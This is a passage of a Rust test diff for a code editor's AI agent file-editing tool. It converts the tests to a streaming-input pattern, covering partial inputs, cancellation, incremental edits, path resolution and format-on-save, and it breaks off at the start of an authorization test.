} = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "new content"); + } + + #[gpui::test] + async fn test_streaming_cancellation_during_partials(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver, mut cancellation_tx) = + ToolCallEventStream::test_with_cancellation(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Send a partial + sender.send_partial(json!({"display_description": "Edit"})); + cx.run_until_parked(); + + // Cancel during streaming + ToolCallEventStream::signal_cancellation_with_sender(&mut cancellation_tx); + cx.run_until_parked(); + + // The sender is still alive so the partial loop should detect cancellation + // We need to drop the sender to also unblock recv() if the loop didn't catch it + drop(sender); + + let result = task.await; + let EditFileToolOutput::Error { error, .. 
} = result.unwrap_err() else { + panic!("expected error"); + }; + assert!( + error.contains("cancelled"), + "Expected cancellation error but got: {error}" + ); + } + + #[gpui::test] + async fn test_streaming_edit_with_multiple_partials(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), + ) + .await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Simulate fine-grained streaming of the JSON + sender.send_partial(json!({"display_description": "Edit multiple"})); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "line 1"}] + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "modified line 1"}, + {"old_text": "line 5"} + ] + })); + cx.run_until_parked(); + + // Send final complete input + sender.send_full(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "modified line 1"}, + {"old_text": "line 5", "new_text": "modified line 5"} + ] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!( + new_text, + "modified line 1\nline 2\nline 3\nline 4\nmodified line 5\n" + ); + } + + #[gpui::test] + async fn test_streaming_create_file_with_partials(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Stream partials for create mode + sender.send_partial(json!({"display_description": "Create new file"})); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "Hello, " + })); + cx.run_until_parked(); + + // Final with full content + sender.send_full(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "Hello, World!" + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "Hello, World!"); + } + + #[gpui::test] + async fn test_streaming_no_partials_direct_final(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Send final immediately with no partials (simulates non-streaming path) + sender.send_full(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); + } + + #[gpui::test] + async fn test_streaming_incremental_edit_application(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), + ) + .await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Stream description, path, mode + sender.send_partial(json!({"display_description": "Edit multiple lines"})); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // First edit starts streaming (old_text only, still in progress) + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "line 1"}] + })); + cx.run_until_parked(); + + // Buffer should not 
have changed yet — the first edit is still in progress + // (no second edit has appeared to prove the first is complete) + let buffer_text = project.update(cx, |project, cx| { + let project_path = project.find_project_path(&PathBuf::from("root/file.txt"), cx); + project_path.and_then(|pp| { + project + .get_open_buffer(&pp, cx) + .map(|buffer| buffer.read(cx).text()) + }) + }); + // Buffer is open (from streaming) but edit 1 is still in-progress + assert_eq!( + buffer_text.as_deref(), + Some("line 1\nline 2\nline 3\nline 4\nline 5\n"), + "Buffer should not be modified while first edit is still in progress" + ); + + // Second edit appears — this proves the first edit is complete, so it + // should be applied immediately during streaming + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "MODIFIED 1"}, + {"old_text": "line 5"} + ] + })); + cx.run_until_parked(); + + // First edit should now be applied to the buffer + let buffer_text = project.update(cx, |project, cx| { + let project_path = project.find_project_path(&PathBuf::from("root/file.txt"), cx); + project_path.and_then(|pp| { + project + .get_open_buffer(&pp, cx) + .map(|buffer| buffer.read(cx).text()) + }) + }); + assert_eq!( + buffer_text.as_deref(), + Some("MODIFIED 1\nline 2\nline 3\nline 4\nline 5\n"), + "First edit should be applied during streaming when second edit appears" + ); + + // Send final complete input + sender.send_full(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "MODIFIED 1"}, + {"old_text": "line 5", "new_text": "MODIFIED 5"} + ] + })); + + let result = task.await; + let EditFileToolOutput::Success { + new_text, old_text, .. 
+ } = result.unwrap() + else { + panic!("expected success"); + }; + assert_eq!(new_text, "MODIFIED 1\nline 2\nline 3\nline 4\nMODIFIED 5\n"); + assert_eq!( + *old_text, "line 1\nline 2\nline 3\nline 4\nline 5\n", + "old_text should reflect the original file content before any edits" + ); + } + + #[gpui::test] + async fn test_streaming_incremental_three_edits(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "aaa\nbbb\nccc\nddd\neee\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Setup: description + path + mode + sender.send_partial(json!({ + "display_description": "Edit three lines", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // Edit 1 in progress + sender.send_partial(json!({ + "display_description": "Edit three lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "aaa", "new_text": "AAA"}] + })); + cx.run_until_parked(); + + // Edit 2 appears — edit 1 is now complete and should be applied + sender.send_partial(json!({ + "display_description": "Edit three lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "aaa", "new_text": "AAA"}, + {"old_text": "ccc", "new_text": "CCC"} + ] + })); + cx.run_until_parked(); + + // Verify edit 1 fully applied. Edit 2's new_text is being + // streamed: "CCC" is inserted but the old "ccc" isn't deleted + // yet (StreamingDiff::finish runs when edit 3 marks edit 2 done). 
+ let buffer_text = project.update(cx, |project, cx| { + let pp = project + .find_project_path(&PathBuf::from("root/file.txt"), cx) + .unwrap(); + project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) + }); + assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCCccc\nddd\neee\n")); + + // Edit 3 appears — edit 2 is now complete and should be applied + sender.send_partial(json!({ + "display_description": "Edit three lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "aaa", "new_text": "AAA"}, + {"old_text": "ccc", "new_text": "CCC"}, + {"old_text": "eee", "new_text": "EEE"} + ] + })); + cx.run_until_parked(); + + // Verify edits 1 and 2 fully applied. Edit 3's new_text is being + // streamed: "EEE" is inserted but old "eee" isn't deleted yet. + let buffer_text = project.update(cx, |project, cx| { + let pp = project + .find_project_path(&PathBuf::from("root/file.txt"), cx) + .unwrap(); + project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) + }); + assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCC\nddd\nEEEeee\n")); + + // Send final + sender.send_full(json!({ + "display_description": "Edit three lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "aaa", "new_text": "AAA"}, + {"old_text": "ccc", "new_text": "CCC"}, + {"old_text": "eee", "new_text": "EEE"} + ] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "AAA\nbbb\nCCC\nddd\nEEE\n"); + } + + #[gpui::test] + async fn test_streaming_edit_failure_mid_stream(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Setup + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // Edit 1 (valid) in progress — not yet complete (no second edit) + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "MODIFIED"} + ] + })); + cx.run_until_parked(); + + // Edit 2 appears (will fail to match) — this makes edit 1 complete. + // Edit 1 should be applied. Edit 2 is still in-progress (last edit). + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "MODIFIED"}, + {"old_text": "nonexistent text that does not appear anywhere in the file at all", "new_text": "whatever"} + ] + })); + cx.run_until_parked(); + + let buffer = project.update(cx, |project, cx| { + let pp = project + .find_project_path(&PathBuf::from("root/file.txt"), cx) + .unwrap(); + project.get_open_buffer(&pp, cx).unwrap() + }); + + // Verify edit 1 was applied + let buffer_text = buffer.read_with(cx, |buffer, _cx| buffer.text()); + assert_eq!( + buffer_text, "MODIFIED\nline 2\nline 3\n", + "First edit should be applied even though second edit will fail" + ); + + // Edit 3 appears — this makes edit 2 "complete", triggering its + // resolution which should fail (old_text doesn't exist in the file). 
+ sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [ + {"old_text": "line 1", "new_text": "MODIFIED"}, + {"old_text": "nonexistent text that does not appear anywhere in the file at all", "new_text": "whatever"}, + {"old_text": "line 3", "new_text": "MODIFIED 3"} + ] + })); + cx.run_until_parked(); + + // The error from edit 2 should have propagated out of the partial loop. + // Drop sender to unblock recv() if the loop didn't catch it. + drop(sender); + + let result = task.await; + let EditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { + panic!("expected error"); + }; + + assert!( + error.contains("Could not find matching text for edit at index 1"), + "Expected error about edit 1 failing, got: {error}" + ); + // Ensure that first edit was applied successfully and that we saved the buffer + assert_eq!(input_path, Some(PathBuf::from("root/file.txt"))); + assert_eq!( + diff, + "@@ -1,3 +1,3 @@\n-line 1\n+MODIFIED\n line 2\n line 3\n" + ); + } + + #[gpui::test] + async fn test_streaming_single_edit_no_incremental(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Setup + single edit that stays in-progress (no second edit to prove completion) + sender.send_partial(json!({ + "display_description": "Single edit", + "path": "root/file.txt", + "mode": "edit", + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Single edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello world", "new_text": "goodbye world"}] + })); + cx.run_until_parked(); + + // The edit's old_text and new_text both arrived in one partial, so + // the 
old_text is resolved and new_text is being streamed via + // StreamingDiff. The buffer reflects the in-progress diff (new text + // inserted, old text not yet fully removed until finalization). + let buffer_text = project.update(cx, |project, cx| { + let pp = project + .find_project_path(&PathBuf::from("root/file.txt"), cx) + .unwrap(); + project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) + }); + assert_eq!( + buffer_text.as_deref(), + Some("goodbye worldhello world\n"), + "In-progress streaming diff: new text inserted, old text not yet removed" + ); + + // Send final — the edit is applied during finalization + sender.send_full(json!({ + "display_description": "Single edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello world", "new_text": "goodbye world"}] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "goodbye world\n"); + } + + #[gpui::test] + async fn test_streaming_input_partials_then_final(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input): (ToolInputSender, ToolInput) = + ToolInput::test(); + let (event_stream, _event_rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Send progressively more complete partial snapshots, as the LLM would + sender.send_partial(json!({ + "display_description": "Edit lines" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] + })); + cx.run_until_parked(); + + // Send the final 
complete input + sender.send_full(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); + } + + #[gpui::test] + async fn test_streaming_input_sender_dropped_before_final(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world\n"})).await; + let (mut sender, input): (ToolInputSender, ToolInput) = + ToolInput::test(); + let (event_stream, _event_rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Send a partial then drop the sender without sending final + sender.send_partial(json!({ + "display_description": "Edit file" + })); + cx.run_until_parked(); + + drop(sender); + + let result = task.await; + assert!( + result.is_err(), + "Tool should error when sender is dropped without sending final input" + ); + } + + #[gpui::test] + async fn test_streaming_input_recv_drains_partials(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + // Create a channel and send multiple partials before a final, then use + // ToolInput::resolved-style immediate delivery to confirm recv() works + // when partials are already buffered. 
+ let (mut sender, input): (ToolInputSender, ToolInput) = + ToolInput::test(); + let (event_stream, _event_rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Buffer several partials before sending the final + sender.send_partial(json!({"display_description": "Create"})); + sender.send_partial(json!({"display_description": "Create", "path": "root/dir/new.txt"})); + sender.send_partial(json!({ + "display_description": "Create", + "path": "root/dir/new.txt", + "mode": "write" + })); + sender.send_full(json!({ + "display_description": "Create", + "path": "root/dir/new.txt", + "mode": "write", + "content": "streamed content" + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "streamed content"); + } + + #[gpui::test] + async fn test_streaming_resolve_path_for_creating_file(cx: &mut TestAppContext) { + let mode = EditFileMode::Write; + + let result = test_resolve_path(&mode, "root/new.txt", cx); + assert_resolved_path_eq(result.await, rel_path("new.txt")); + + let result = test_resolve_path(&mode, "new.txt", cx); + assert_resolved_path_eq(result.await, rel_path("new.txt")); + + let result = test_resolve_path(&mode, "dir/new.txt", cx); + assert_resolved_path_eq(result.await, rel_path("dir/new.txt")); + + let result = test_resolve_path(&mode, "root/dir/subdir/existing.txt", cx); + assert_resolved_path_eq(result.await, rel_path("dir/subdir/existing.txt")); + + let result = test_resolve_path(&mode, "root/dir/subdir", cx); + assert_eq!( + result.await.unwrap_err(), + "Can't write to file: path is a directory" + ); + + let result = test_resolve_path(&mode, "root/dir/nonexistent_dir/new.txt", cx); + assert_eq!( + result.await.unwrap_err(), + "Can't create file: parent directory doesn't exist" + ); + } + + #[gpui::test] + async fn test_streaming_resolve_path_for_editing_file(cx: &mut TestAppContext) 
{ + let mode = EditFileMode::Edit; + + let path_with_root = "root/dir/subdir/existing.txt"; + let path_without_root = "dir/subdir/existing.txt"; + let result = test_resolve_path(&mode, path_with_root, cx); + assert_resolved_path_eq(result.await, rel_path(path_without_root)); + + let result = test_resolve_path(&mode, path_without_root, cx); + assert_resolved_path_eq(result.await, rel_path(path_without_root)); + + let result = test_resolve_path(&mode, "root/nonexistent.txt", cx); + assert_eq!(result.await.unwrap_err(), "Can't edit file: path not found"); + + let result = test_resolve_path(&mode, "root/dir", cx); + assert_eq!( + result.await.unwrap_err(), "Can't edit file: path is a directory" ); } @@ -719,7 +2260,7 @@ mod tests { mode: &EditFileMode, path: &str, cx: &mut TestAppContext, - ) -> anyhow::Result { + ) -> Result { init_test(cx); let fs = project::FakeFs::new(cx.executor()); @@ -736,31 +2277,24 @@ mod tests { .await; let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let input = EditFileToolInput { - display_description: "Some edit".into(), - path: path.into(), - mode: mode.clone(), - }; - - cx.update(|cx| resolve_path(&input, project, cx)) + cx.update(|cx| resolve_path(*mode, &PathBuf::from(path), &project, cx)) } #[track_caller] - fn assert_resolved_path_eq(path: anyhow::Result, expected: &RelPath) { + fn assert_resolved_path_eq(path: Result, expected: &RelPath) { let actual = path.expect("Should return valid path").path; assert_eq!(actual.as_ref(), expected); } #[gpui::test] - async fn test_format_on_save(cx: &mut TestAppContext) { + async fn test_streaming_format_on_save(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/root", json!({"src": {}})).await; + let (tool, project, action_log, fs, thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - - // Set up a Rust 
language with LSP formatting support let rust_language = Arc::new(language::Language::new( language::LanguageConfig { name: "Rust".into(), @@ -773,7 +2307,6 @@ mod tests { None, )); - // Register the language and fake LSP let language_registry = project.read_with(cx, |project, _| project.languages().clone()); language_registry.add(rust_language); @@ -788,7 +2321,6 @@ mod tests { }, ); - // Create the file fs.save( path!("/root/src/main.rs").as_ref(), &"initial content".into(), @@ -810,9 +2342,10 @@ mod tests { project.register_buffer_with_language_servers(&buffer, cx) }); - const UNFORMATTED_CONTENT: &str = "fn main() {println!(\"Hello!\");}\n"; - const FORMATTED_CONTENT: &str = - "This file was formatted by the fake formatter in the test.\n"; + const UNFORMATTED_CONTENT: &str = "fn main() {println!(\"Hello!\");}\ +"; + const FORMATTED_CONTENT: &str = "This file was formatted by the fake formatter in the test.\ +"; // Get the fake language server and set up formatting handler let fake_language_server = fake_language_servers.next().await.unwrap(); @@ -825,21 +2358,7 @@ mod tests { } }); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - - // First, test with format_on_save enabled + // Test with format_on_save enabled cx.update(|cx| { SettingsStore::update_global(cx, |store, cx| { store.update_user_settings(cx, |settings| { @@ -850,43 +2369,33 @@ mod tests { }); }); - // Have the model stream unformatted content - let edit_result = { - let edit_task = cx.update(|cx| { - let input = EditFileToolInput { - display_description: "Create main function".into(), - path: "root/src/main.rs".into(), - mode: EditFileMode::Overwrite, - }; - Arc::new(EditFileTool::new( 
- project.clone(), - thread.downgrade(), - language_registry.clone(), - Templates::new(), - )) - .run( - ToolInput::resolved(input), - ToolCallEventStream::test().0, - cx, - ) - }); + // Use streaming pattern so executor can pump the LSP request/response + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); - // Stream the unformatted content - cx.executor().run_until_parked(); - model.send_last_completion_stream_text_chunk(UNFORMATTED_CONTENT.to_string()); - model.end_last_completion_stream(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - edit_task.await - }; - assert!(edit_result.is_ok()); + sender.send_partial(json!({ + "display_description": "Create main function", + "path": "root/src/main.rs", + "mode": "write" + })); + cx.run_until_parked(); + + sender.send_full(json!({ + "display_description": "Create main function", + "path": "root/src/main.rs", + "mode": "write", + "content": UNFORMATTED_CONTENT + })); + + let result = task.await; + assert!(result.is_ok()); - // Wait for any async operations (e.g. formatting) to complete cx.executor().run_until_parked(); - // Read the file to verify it was formatted automatically let new_content = fs.load(path!("/root/src/main.rs").as_ref()).await.unwrap(); assert_eq!( - // Ignore carriage returns on Windows new_content.replace("\r\n", "\n"), FORMATTED_CONTENT, "Code should be formatted when format_on_save is enabled" @@ -898,12 +2407,11 @@ mod tests { assert_eq!( stale_buffer_count, 0, - "BUG: Buffer is incorrectly marked as stale after format-on-save. Found {} stale buffers. \ - This causes the agent to think the file was modified externally when it was just formatted.", + "BUG: Buffer is incorrectly marked as stale after format-on-save. 
Found {} stale buffers.", stale_buffer_count ); - // Next, test with format_on_save disabled + // Test with format_on_save disabled cx.update(|cx| { SettingsStore::update_global(cx, |store, cx| { store.update_user_settings(cx, |settings| { @@ -913,43 +2421,39 @@ mod tests { }); }); - // Stream unformatted edits again - let edit_result = { - let edit_task = cx.update(|cx| { - let input = EditFileToolInput { - display_description: "Update main function".into(), - path: "root/src/main.rs".into(), - mode: EditFileMode::Overwrite, - }; - Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )) - .run( - ToolInput::resolved(input), - ToolCallEventStream::test().0, - cx, - ) - }); + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); - // Stream the unformatted content - cx.executor().run_until_parked(); - model.send_last_completion_stream_text_chunk(UNFORMATTED_CONTENT.to_string()); - model.end_last_completion_stream(); + let tool2 = Arc::new(EditFileTool::new( + project.clone(), + thread.downgrade(), + action_log.clone(), + language_registry, + )); - edit_task.await - }; - assert!(edit_result.is_ok()); + let task = cx.update(|cx| tool2.run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Update main function", + "path": "root/src/main.rs", + "mode": "write" + })); + cx.run_until_parked(); + + sender.send_full(json!({ + "display_description": "Update main function", + "path": "root/src/main.rs", + "mode": "write", + "content": UNFORMATTED_CONTENT + })); + + let result = task.await; + assert!(result.is_ok()); - // Wait for any async operations (e.g. 
formatting) to complete cx.executor().run_until_parked(); - // Verify the file was not formatted let new_content = fs.load(path!("/root/src/main.rs").as_ref()).await.unwrap(); assert_eq!( - // Ignore carriage returns on Windows new_content.replace("\r\n", "\n"), UNFORMATTED_CONTENT, "Code should not be formatted when format_on_save is disabled" @@ -957,13 +2461,11 @@ mod tests { } #[gpui::test] - async fn test_remove_trailing_whitespace(cx: &mut TestAppContext) { + async fn test_streaming_remove_trailing_whitespace(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/root", json!({"src": {}})).await; - - // Create a simple file with trailing whitespace fs.save( path!("/root/src/main.rs").as_ref(), &"initial content".into(), @@ -971,24 +2473,11 @@ mod tests { ) .await .unwrap(); + let (tool, project, action_log, fs, thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; + let language_registry = project.read_with(cx, |p, _cx| p.languages().clone()); - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - - // First, test with remove_trailing_whitespace_on_save enabled + // Test with remove_trailing_whitespace_on_save enabled cx.update(|cx| { SettingsStore::update_global(cx, |store, cx| { store.update_user_settings(cx, |settings| { @@ -1004,44 +2493,26 @@ mod tests { const CONTENT_WITH_TRAILING_WHITESPACE: &str = "fn main() { \n println!(\"Hello!\"); \n}\n"; - // Have the model stream content that contains trailing 
whitespace - let edit_result = { - let edit_task = cx.update(|cx| { - let input = EditFileToolInput { - display_description: "Create main function".into(), - path: "root/src/main.rs".into(), - mode: EditFileMode::Overwrite, - }; - Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry.clone(), - Templates::new(), - )) - .run( - ToolInput::resolved(input), + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Create main function".into(), + path: "root/src/main.rs".into(), + mode: EditFileMode::Write, + content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), + edits: None, + }), ToolCallEventStream::test().0, cx, ) - }); - - // Stream the content with trailing whitespace - cx.executor().run_until_parked(); - model.send_last_completion_stream_text_chunk( - CONTENT_WITH_TRAILING_WHITESPACE.to_string(), - ); - model.end_last_completion_stream(); - - edit_task.await - }; - assert!(edit_result.is_ok()); + }) + .await; + assert!(result.is_ok()); - // Wait for any async operations (e.g. 
formatting) to complete cx.executor().run_until_parked(); - // Read the file to verify trailing whitespace was removed automatically assert_eq!( - // Ignore carriage returns on Windows fs.load(path!("/root/src/main.rs").as_ref()) .await .unwrap() @@ -1050,7 +2521,7 @@ mod tests { "Trailing whitespace should be removed when remove_trailing_whitespace_on_save is enabled" ); - // Next, test with remove_trailing_whitespace_on_save disabled + // Test with remove_trailing_whitespace_on_save disabled cx.update(|cx| { SettingsStore::update_global(cx, |store, cx| { store.update_user_settings(cx, |settings| { @@ -1063,46 +2534,34 @@ mod tests { }); }); - // Stream edits again with trailing whitespace - let edit_result = { - let edit_task = cx.update(|cx| { - let input = EditFileToolInput { - display_description: "Update main function".into(), - path: "root/src/main.rs".into(), - mode: EditFileMode::Overwrite, - }; - Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )) - .run( - ToolInput::resolved(input), + let tool2 = Arc::new(EditFileTool::new( + project.clone(), + thread.downgrade(), + action_log.clone(), + language_registry, + )); + + let result = cx + .update(|cx| { + tool2.run( + ToolInput::resolved(EditFileToolInput { + display_description: "Update main function".into(), + path: "root/src/main.rs".into(), + mode: EditFileMode::Write, + content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), + edits: None, + }), ToolCallEventStream::test().0, cx, ) - }); - - // Stream the content with trailing whitespace - cx.executor().run_until_parked(); - model.send_last_completion_stream_text_chunk( - CONTENT_WITH_TRAILING_WHITESPACE.to_string(), - ); - model.end_last_completion_stream(); - - edit_task.await - }; - assert!(edit_result.is_ok()); + }) + .await; + assert!(result.is_ok()); - // Wait for any async operations (e.g. 
formatting) to complete cx.executor().run_until_parked(); - // Verify the file still has trailing whitespace - // Read the file again - it should still have trailing whitespace let final_content = fs.load(path!("/root/src/main.rs").as_ref()).await.unwrap(); assert_eq!( - // Ignore carriage returns on Windows final_content.replace("\r\n", "\n"), CONTENT_WITH_TRAILING_WHITESPACE, "Trailing whitespace should remain when remove_trailing_whitespace_on_save is disabled" @@ -1110,41 +2569,15 @@ mod tests { } #[gpui::test] - async fn test_authorize(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); - fs.insert_tree("/root", json!({})).await; + async fn test_streaming_authorize(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({})).await; // Test 1: Path with .zed component should require confirmation let (stream_tx, mut stream_rx) = 